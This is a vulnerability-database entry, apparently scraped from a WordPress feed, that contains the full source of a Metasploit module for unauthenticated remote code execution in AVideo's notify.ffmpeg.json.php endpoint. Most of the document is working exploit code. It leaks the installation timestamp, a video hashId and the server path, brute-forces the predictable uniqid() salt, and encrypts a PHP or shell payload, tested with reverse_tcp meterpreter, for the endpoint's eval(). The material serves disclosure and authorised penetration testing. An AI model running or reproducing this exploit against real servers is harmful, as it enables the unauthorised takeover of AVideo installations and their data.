{“lastseen”:”2026-01-16T19:28:01″,”description”:”This module exploits an unauthenticated remote code execution RCE vulnerability in AVideo’s notify.ffmpeg.json.php endpoint. The vulnerability stems from a critical cryptographic weakness in the salt generation mechanism combined with information…”,”published”:”2026-01-16T18:59:10″,”modified”:”2026-01-16T18:59:10″,”type”:”metasploit”,”title”:”AVideo notify.ffmpeg.json.php Unauthenticated RCE via Salt Discovery”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-MULTI-HTTP-AVIDEO_NOTIFY_FFMPEG_UNAUTH_RCE-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-34433″,”CVE-2025-34441″,”CVE-2025-34442″],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nrequire ‘openssl’\\nrequire ‘time’\\nrequire ‘tzinfo’\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Remote\\n Rank = ExcellentRanking\\n\\n include Msf::Payload::Php\\n include Msf::Exploit::Remote::HttpClient\\n prepend Msf::Exploit::Remote::AutoCheck\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘AVideo notify.ffmpeg.json.php Unauthenticated RCE via Salt Discovery’,\\n ‘Description’ =\\u003e %q{\\n This module exploits an unauthenticated remote code execution (RCE) vulnerability\\n in AVideo’s notify.ffmpeg.json.php endpoint. The vulnerability stems from a critical\\n cryptographic weakness in the salt generation mechanism combined with information\\n disclosure vulnerabilities that allow an attacker to discover the encryption salt\\n through offline bruteforce.\\n\\n Root Cause:\\n During installation, AVideo generates an encryption salt using PHP’s uniqid() function,\\n which is not cryptographically secure. uniqid() generates a 13-character hexadecimal\\n string composed of: 8 characters for Unix timestamp in hex, and 5 characters for\\n microseconds in hex (0x00000 to 0xFFFFF = 1,048,576 possible values).\\n\\n Exploit Chain:\\n 1. Leak installation timestamp from \/objects\/categories.json.php (public endpoint)\\n 2. Leak video hashId from \/objects\/videosAndroid.json.php or \/plugin\/API\/get.json.php\\n 3. Leak system root path from posterPortraitPath in video API responses\\n 4. Leak server timezones from \/objects\/getTimes.json.php\\n 5. Offline bruteforce of the remaining 5 microsecond characters using hashId comparison\\n 6. Use recovered salt to encrypt RCE payload for notify.ffmpeg.json.php eval()\\n\\n The notify.ffmpeg.json.php endpoint uses decryptString() to decrypt the callback parameter,\\n which has a fallback mechanism: if decryption with saltV2 (cryptographically secure) fails,\\n it retries with the old uniqid() salt. This fallback makes the RCE exploitable.\\n\\n Affected Versions:\\n AVideo 14.3.1+ (introduced January 7, 2025). Requires: Fallback mechanism in\\n encrypt_decrypt() (introduced January 15, 2024) and notify.ffmpeg.json.php with\\n eval($callback) (introduced January 7, 2025).\\n\\n Note on v20.0: The vendor removed the posterPortraitPath leak but did NOT remove\\n the legacy salt fallback or eval($callback). RCE remains exploitable using SYSTEM_ROOT.\\n\\n This vulnerability does not require authentication and can be exploited remotely by any\\n attacker who can access the AVideo instance.\\n },\\n ‘Author’ =\\u003e [\\n ‘Valentin Lobstein \\u003cchocapikk[at]leakix.net\\u003e’ # Discovery and Metasploit module\\n ],\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘References’ =\\u003e [\\n [‘CVE’, ‘2025-34433’], # Unauthenticated RCE via Predictable Salt\\n [‘CVE’, ‘2025-34441’], # Information Disclosure: hashId leak\\n [‘CVE’, ‘2025-34442’], # Information Disclosure: System Path leak\\n [‘URL’, ‘https:\/\/github.com\/WWBN\/AVideo\/pull\/10284’],\\n [‘URL’, ‘https:\/\/chocapikk.com\/posts\/2025\/avideo-security-vulnerabilities\/’],\\n [‘URL’, ‘https:\/\/www.vulncheck.com\/advisories\/avideo-unauthenticated-rce-via-predictable-installation-salt’]\\n ],\\n ‘Platform’ =\\u003e %w[php unix linux win],\\n ‘Arch’ =\\u003e [ARCH_PHP, ARCH_CMD],\\n ‘Targets’ =\\u003e [\\n [\\n ‘PHP In-Memory’,\\n {\\n ‘Platform’ =\\u003e ‘php’,\\n ‘Arch’ =\\u003e ARCH_PHP\\n # tested with php\/meterpreter\/reverse_tcp\\n }\\n ],\\n [\\n ‘Unix\/Linux Command Shell’,\\n {\\n ‘Platform’ =\\u003e %w[unix linux],\\n ‘Arch’ =\\u003e ARCH_CMD\\n # tested with cmd\/linux\/http\/x64\/meterpreter\/reverse_tcp\\n }\\n ],\\n [\\n ‘Windows Command Shell’,\\n {\\n ‘Platform’ =\\u003e ‘win’,\\n ‘Arch’ =\\u003e ARCH_CMD\\n # tested with cmd\/windows\/http\/x64\/meterpreter\/reverse_tcp\\n }\\n ]\\n ],\\n ‘Privileged’ =\\u003e false,\\n ‘DisclosureDate’ =\\u003e ‘2025-12-19’,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION],\\n ‘SideEffects’ =\\u003e [IOC_IN_LOGS]\\n }\\n )\\n )\\n\\n register_options([\\n OptString.new(‘TARGETURI’, [true, ‘The base path to AVideo’, ‘\/’]),\\n OptString.new(‘SALT’, [false, ‘Known salt (skips bruteforce)’, ”]),\\n OptString.new(‘SYSTEM_ROOT’, [false, ‘System root path (fallback if leak fails)’, ‘\/var\/www\/html\/AVideo\/’])\\n ])\\n end\\n\\n def check\\n gather_info\\n return CheckCode::Safe(‘notify.ffmpeg.json.php not found (requires 14.3.1+)’) unless @notify_exists\\n\\n salt_provided = !datastore[‘SALT’].to_s.empty?\\n unless salt_provided\\n return CheckCode::Safe(‘categories.json.php inaccessible (timestamp leak required)’) unless @timestamp_accessible\\n return CheckCode::Safe(‘hashId endpoints inaccessible (videosAndroid.json.php or get.json.php required)’) unless @hashid_accessible\\n end\\n\\n return CheckCode::Appears(\\”Vulnerable version #{@version} detected\\”) if @version \\u0026\\u0026 @version \\u003e= Rex::Version.new(‘14.3.1’)\\n return CheckCode::Safe(\\”Version #{@version} requires 14.3.1+\\”) if @version\\n\\n CheckCode::Appears(‘Prerequisites met (version unknown)’)\\n end\\n\\n def exploit\\n gather_info\\n fail_with(Failure::Unknown, ‘Failed to discover salt’) unless discover_salt\\n\\n callback_payload = target[‘Arch’] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)\\n vprint_status(‘Executing payload…’)\\n res = send_rce_payload(callback_payload)\\n\\n return if session_created?\\n\\n if res\\u0026.code == 200\\n vprint_status(\\”Payload executed (response: #{res.code})\\”)\\n return\\n end\\n\\n error_msg = parse_error_from_response(res)\\n fail_with(Failure::Unknown, error_msg ? \\”Exploit failed: #{error_msg}\\” : \\”Unexpected response code: #{res\\u0026.code}\\”)\\n end\\n\\n def parse_error_from_response(res)\\n return nil unless res\\u0026.body\\n\\n data = JSON.parse(res.body)\\n return data[‘msg’] if data[‘msg’] \\u0026\\u0026 !data[‘msg’].to_s.empty?\\n return ‘Unknown error’ if data[‘error’] == true\\n\\n nil\\n rescue JSON::ParserError\\n nil\\n end\\n\\n def gather_info\\n return if @notify_exists \\u0026\\u0026 @timestamp_accessible \\u0026\\u0026 @hashid_accessible \\u0026\\u0026 @timestamps \\u0026\\u0026 @video_info\\n\\n vprint_status(‘Gathering target information…’)\\n detect_version\\n @notify_exists = check_notify_endpoint\\n\\n @timestamp_accessible = check_endpoint(‘objects\/categories.json.php’)\\n @timestamps ||= get_timestamps if @timestamp_accessible\\n\\n # get_video_info caches endpoint responses, reused by get_system_root to avoid duplicate requests\\n @video_info ||= get_video_info\\n @hashid_accessible = !@video_info.nil?\\n end\\n\\n def detect_version\\n res = send_request_cgi({ ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘index.php’), ‘method’ =\\u003e ‘GET’, ‘follow_redirect’ =\\u003e true })\\n return unless res\\u0026.code == 200\\n\\n version_match = res.body.match(\/Powered by AVideo \u00ae Platform v([\\\\d.]+)\/) || res.body.match(\/\\u003c!–.*?v:([\\\\d.]+).*?–\\u003e\/m)\\n return unless version_match \\u0026\\u0026 version_match[1]\\n\\n @version = Rex::Version.new(version_match[1])\\n vprint_status(\\”Detected AVideo version: #{@version}\\”)\\n end\\n\\n def check_endpoint(path)\\n res = send_request_cgi({ ‘uri’ =\\u003e normalize_uri(target_uri.path, path), ‘method’ =\\u003e ‘GET’ })\\n res\\u0026.code == 200\\n end\\n\\n def check_notify_endpoint\\n res = send_request_cgi({ ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘plugin’, ‘API’, ‘notify.ffmpeg.json.php’), ‘method’ =\\u003e ‘GET’ })\\n return false unless res\\n\\n res.code == 403 \\u0026\\u0026 res.body.to_s.include?(‘Empty notifyCode’)\\n end\\n\\n # Fetch server timezones to test multiple uniqid calculations with different offsets\\n def get_timezones\\n res = send_request_cgi({\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘objects’, ‘getTimes.json.php’),\\n ‘method’ =\\u003e ‘GET’\\n })\\n return [nil, nil] unless res\\u0026.code == 200\\n\\n data = JSON.parse(res.body)\\n [data[‘_serverSystemTimezone’], data[‘_serverDBTimezone’]]\\n rescue StandardError\\n [nil, nil]\\n end\\n\\n # If the default category created at install was deleted, exploit will fail (timestamp not guessable)\\n def get_timestamps\\n vprint_status(‘Leaking installation timestamp…’)\\n system_tz, db_tz = get_timezones\\n vprint_status(\\”Server timezones: system=#{system_tz}, db=#{db_tz}\\”)\\n\\n res = send_request_cgi({ ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘objects’, ‘categories.json.php’), ‘method’ =\\u003e ‘GET’ })\\n return [] unless res\\u0026.code == 200\\n\\n # Try JSON parsing first, fallback to regex if JSON is invalid\\n timestamps = parse_timestamps_from_json(res.body, system_tz, db_tz)\\n return timestamps if timestamps.any?\\n\\n parse_timestamps_from_regex(res.body, system_tz, db_tz)\\n end\\n\\n def parse_timestamps_from_json(body, system_tz, db_tz)\\n data = JSON.parse(body)\\n rows = data[‘rows’]\\n return [] unless rows.is_a?(Array) \\u0026\\u0026 !rows.empty?\\n\\n first_category = rows.min_by { |c| c[‘id’].to_i }\\n created = first_category[‘created’]\\n timestamps = datetime_to_timestamps(created, system_tz, db_tz)\\n vprint_good(\\”Installation timestamp: #{created} -\\u003e #{timestamps.first}\\”)\\n timestamps\\n rescue JSON::ParserError\\n []\\n end\\n\\n def parse_timestamps_from_regex(body, system_tz, db_tz)\\n matches = body.scan(\/\\”id\\”\\\\s*:\\\\s*(\\\\d+).*?\\”created\\”\\\\s*:\\\\s*\\”([^\\”]+)\\”\/m)\\n return [] if matches.empty?\\n\\n created = matches.min_by { |m| m[0].to_i }[1]\\n timestamps = datetime_to_timestamps(created, system_tz, db_tz)\\n vprint_good(\\”Installation timestamp (regex): #{created} -\\u003e #{timestamps.first}\\”)\\n timestamps\\n end\\n\\n def datetime_to_timestamps(dt_str, system_tz, db_tz)\\n dt = Time.strptime(dt_str, ‘%Y-%m-%d %H:%M:%S’)\\n dt_local = Time.new(dt.year, dt.month, dt.day, dt.hour, dt.min, dt.sec)\\n timezones = [system_tz, db_tz, ‘UTC’].compact.uniq\\n\\n timezones.map do |tz|\\n tz_obj = TZInfo::Timezone.get(tz)\\n format(‘%x’, tz_obj.local_to_utc(dt_local).to_i)\\n end.uniq\\n rescue StandardError =\\u003e e\\n vprint_error(\\”Error converting datetime: #{e}\\”)\\n []\\n end\\n\\n def get_system_root\\n return @system_root if @system_root \\u0026\\u0026 !@system_root.empty?\\n\\n # Try to get from cached endpoint responses first\\n @system_root = extract_system_root_from_cache\\n if @system_root\\n vprint_good(\\”System root leaked: #{@system_root}\\”)\\n return @system_root\\n end\\n\\n # On v20+, path leak is fixed; fallback to SYSTEM_ROOT (default works for Docker instances)\\n @system_root = datastore[‘SYSTEM_ROOT’]\\n vprint_status(\\”Using fallback system root: #{@system_root}\\”)\\n @system_root\\n end\\n\\n def extract_system_root_from_cache\\n pattern = \/\\”poster(?:Portrait|Landscape)Path\\”\\\\s*:\\\\s*\\”([^\\”]+)\\”\/\\n\\n # Collect all cached response bodies to scan\\n bodies = (@endpoint_cache || {}).values\\n\\n bodies.each do |body|\\n body.scan(pattern).each do |match|\\n path = match[0].gsub(‘\\\\\\\\\/’, ‘\/’)\\n root = find_root_in_path(path)\\n return root if root\\n end\\n end\\n nil\\n end\\n\\n def find_root_in_path(path)\\n %w[\/view\/ \/videos\/ \/plugin\/].each do |subdir|\\n return path.split(subdir)[0] + ‘\/’ if path.include?(subdir)\\n end\\n nil\\n end\\n\\n # Fetch video endpoints once and cache responses for reuse (hashId + system_root extraction)\\n # Note: videosAndroid.json.php can take a long time to load, this is expected\\n # hashId won’t be accessible if no public videos exist on the instance\\n def get_video_info\\n vprint_status(‘Leaking video hashId…’)\\n @endpoint_cache ||= {}\\n\\n endpoints = [\\n normalize_uri(target_uri.path, ‘objects’, ‘videosAndroid.json.php’),\\n normalize_uri(target_uri.path, ‘plugin’, ‘API’, ‘get.json.php’) + ‘?APIName=video’,\\n normalize_uri(target_uri.path, ‘view’, ‘info.php’)\\n ]\\n\\n endpoints.each do |endpoint|\\n info = extract_video_info_from_endpoint(endpoint)\\n return info if info\\n rescue StandardError =\\u003e e\\n vprint_error(\\”Error checking #{endpoint}: #{e}\\”)\\n end\\n nil\\n end\\n\\n def extract_video_info_from_endpoint(endpoint)\\n # Use cached response if available\\n body = @endpoint_cache[endpoint]\\n unless body\\n res = send_request_cgi({ ‘uri’ =\\u003e endpoint, ‘method’ =\\u003e ‘GET’ })\\n return nil unless res\\u0026.code == 200\\n\\n body = res.body\\n @endpoint_cache[endpoint] = body\\n end\\n\\n data = JSON.parse(body)\\n videos = data[‘videos’] || data.dig(‘response’, ‘rows’) || (data[‘response’].is_a?(Array) ? data[‘response’] : [])\\n return nil if videos.empty?\\n\\n video = videos.find { |v| v[‘id’] \\u0026\\u0026 v[‘hashId’] }\\n return nil unless video\\n\\n hash_id = video[‘hashId’]\\n cipher = hash_id.length \\u003c 16 ? ‘RC4’ : ‘AES-128-CBC’\\n vprint_good(\\”Video ID=#{video[‘id’]}, hashId=#{hash_id} (#{cipher})\\”)\\n { id: video[‘id’].to_i, hash_id: hash_id, cipher: cipher }\\n end\\n\\n def compute_hashid(video_id, salt, cipher_type = ‘AES-128-CBC’)\\n key = Digest::MD5.hexdigest(salt)[0, 16]\\n plaintext = video_id.to_s(32)\\n cipher = OpenSSL::Cipher.new(cipher_type)\\n cipher.encrypt\\n cipher.key = key\\n cipher.iv = key if cipher_type == ‘AES-128-CBC’\\n\\n Rex::Text.encode_base64url(cipher.update(plaintext) + cipher.final)\\n end\\n\\n def encrypt_payload(payload)\\n key = Digest::SHA256.hexdigest(@salt)[0, 32]\\n iv = Digest::SHA256.hexdigest(@system_root)[0, 16]\\n\\n cipher = OpenSSL::Cipher.new(‘AES-256-CBC’)\\n cipher.encrypt\\n cipher.key = key\\n cipher.iv = iv\\n\\n Rex::Text.encode_base64(Rex::Text.encode_base64(cipher.update(payload) + cipher.final))\\n end\\n\\n def test_salt_candidate(candidate, video)\\n compute_hashid(video[:id], candidate, video[:cipher]) == video[:hash_id]\\n end\\n\\n def print_bruteforce_progress(ts_idx, timestamps_count, ts_hex, micro, total)\\n return unless (micro % 100_000).zero? \\u0026\\u0026 micro \\u003e 0\\n\\n current = (ts_idx * 0x100000) + micro\\n pct = (100.0 * current \/ total).round(1)\\n formatted_micro = micro.to_s.reverse.gsub(\/(\\\\d{3})(?=\\\\d)\/, ‘\\\\\\\\1,’).reverse\\n print(\\”%bld%blu[*]%clr [#{ts_idx + 1}\/#{timestamps_count}] #{ts_hex}: #{formatted_micro} (#{pct}%)\\\\r\\”)\\n end\\n\\n def bruteforce_salt(timestamps, video)\\n vprint_status(\\”Bruteforcing salt (#{video[:cipher]})…\\”)\\n start_time = Time.now\\n total = timestamps.length * 0x100000\\n\\n timestamps.each_with_index do |ts_hex, ts_idx|\\n (0…0x100000).each do |micro|\\n candidate = format(‘%s%05x’, ts_hex, micro)\\n if test_salt_candidate(candidate, video)\\n print(\\”\\\\r\\”)\\n elapsed = (Time.now – start_time).round(2)\\n vprint_good(\\”Salt found: #{candidate} (in #{elapsed}s)\\”)\\n return candidate\\n end\\n print_bruteforce_progress(ts_idx, timestamps.length, ts_hex, micro, total)\\n end\\n end\\n\\n print(\\”\\\\r\\”)\\n nil\\n end\\n\\n def discover_salt\\n @salt ||= datastore[‘SALT’] unless datastore[‘SALT’].to_s.empty?\\n if @salt\\n vprint_good(\\”Using provided salt: #{@salt}\\”)\\n return get_system_root\\n end\\n\\n get_system_root\\n @timestamps ||= get_timestamps\\n @video_info ||= get_video_info\\n return false if @timestamps.empty? || !@video_info\\n\\n @salt = bruteforce_salt(@timestamps, @video_info)\\n !@salt.nil?\\n end\\n\\n def send_rce_payload(callback_payload)\\n notify_code = encrypt_payload(‘valid’)\\n callback = encrypt_payload(callback_payload)\\n\\n filename = Rex::Text.rand_text_alphanumeric(8..16)\\n ext = %w[mp4 avi mkv mov webm].sample\\n full_filename = \\”#{filename}.#{ext}\\”\\n\\n notify_data = {\\n ‘avideoPath’ =\\u003e full_filename,\\n ‘avideoRelativePath’ =\\u003e full_filename,\\n ‘avideoFilename’ =\\u003e filename\\n }\\n notify = JSON.generate(notify_data.to_a.shuffle.to_h)\\n\\n params = {\\n ‘notifyCode’ =\\u003e notify_code,\\n ‘notify’ =\\u003e notify,\\n ‘callback’ =\\u003e callback\\n }\\n\\n res = send_request_cgi({\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘plugin’, ‘API’, ‘notify.ffmpeg.json.php’),\\n ‘method’ =\\u003e ‘GET’,\\n ‘vars_get’ =\\u003e params.to_a.shuffle.to_h\\n })\\n res\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/multi\/http\/avideo_notify_ffmpeg_unauth_rce.rb”,”cvss”:{“score”:9.3,”severity”:”CRITICAL”,”vector”:”CVSS:4.0\/AV:N\/AC:L\/AT:N\/PR:N\/UI:N\/VC:H\/SC:N\/VI:H\/SI:N\/VA:H\/SA:N”,”version”:”4.0″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/exploit\/multi\/http\/avideo_notify_ffmpeg_unauth_rce\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-01-16T19:28:01″,”description”:”This module exploits an unauthenticated remote code execution RCE vulnerability in AVideo’s notify.ffmpeg.json.php endpoint. The vulnerability stems from a critical cryptographic weakness in the salt…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,55,12,169,13,7,11,5],"class_list":["post-36080","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-93","tag-exploit","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n